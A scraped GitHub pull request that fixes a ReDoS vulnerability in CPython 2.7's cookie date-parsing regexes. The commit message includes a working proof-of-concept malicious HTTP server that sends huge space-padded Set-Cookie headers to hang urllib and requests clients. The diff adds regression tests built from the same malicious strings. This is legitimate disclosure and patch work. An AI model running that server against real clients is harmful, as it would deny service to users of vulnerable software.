8000 [2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) by vstinner · Pull Request #17345 · python/cpython · GitHub
[go: up one dir, main page]

Skip to content

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Nov 24, 2019
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
  • Loading branch information
bcaller authored and vstinner committed Nov 22, 2019
commit 0b985cd152f21c5417e2b4695e92b950919eaceb
20 changes: 13 additions & 7 deletions Lib/cookielib.py
Original file line number Diff line number Diff line change
Expand Up @@ -205,10 +205,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
(?::(\d\d))? # optional seconds
)? # optional clock
\s*
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
(?:
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
\s*
)?
(?:
\(\w+\) # ASCII representation of timezone in parens.
\s*
(?:\(\w+\))? # ASCII representation of timezone in parens.
\s*$""", re.X)
)?$""", re.X)
def http2time(text):
"""Returns time in seconds since epoch of time represented by a string.

Expand Down Expand Up @@ -266,7 +270,7 @@ def http2time(text):
return _str2time(day, mon, yr, hr, min, sec, tz)

ISO_DATE_RE = re.compile(
"""^
r"""^
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there a reason that this r is needed specifically for python 2? I suppose it is preferred, but gives the same regex with or without (str(sre_parse.parse("""^... with and without give the same result).
Unrelated to this change, I just noticed that the backslash in [-\/] doesn't do anything. Not sure why it's there.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oh I see the r wasn't in the python2 branch.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

So.... adding the r is correct, right?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

yes. Ignore me.

(\d{4}) # year
[-\/]?
(\d\d?) # numerical month
Expand All @@ -278,9 +282,11 @@ def http2time(text):
(?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
)? # optional clock
\s*
([-+]?\d\d?:?(:?\d\d)?
|Z|z)? # timezone (Z is "zero meridian", i.e. GMT)
\s*$""", re.X)
(?:
([-+]?\d\d?:?(:?\d\d)?
|Z|z) # timezone (Z is "zero meridian", i.e. GMT)
\s*
)?$""", re.X)
def iso2time(text):
"""
As for http2time, but parses the ISO 8601 formats:
Expand Down
15 changes: 14 additions & 1 deletion Lib/test/test_cookielib.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
import re
import time

from cookielib import http2time, time2isoz, time2netscape
from cookielib import http2time, time2isoz, iso2time, time2netscape
from unittest import TestCase

from test import test_support
Expand Down Expand Up @@ -117,6 +117,19 @@ def test_http2time_garbage(self):
"http2time(test) %s" % (test, http2time(test))
)

def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress to cubic complexity, this test will take a very long time to succeed.
# If fixed, it should complete within a fraction of a second.
http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))

def test_iso2time_performance_regression(self):
# If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
# If fixed, it should complete within a fraction of a second.
iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))


class HeaderTests(TestCase):

Expand Down
1 change: 1 addition & 0 deletions Misc/ACKS
Original file line number Diff line number Diff line change
Expand Up @@ -210,6 +210,7 @@ Ralph Butler
Zach Byrne
Nicolas Cadou
Jp Calderone
Ben Caller
Arnaud Calmettes
Daniel Calvelo
Tony Campbell
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.
0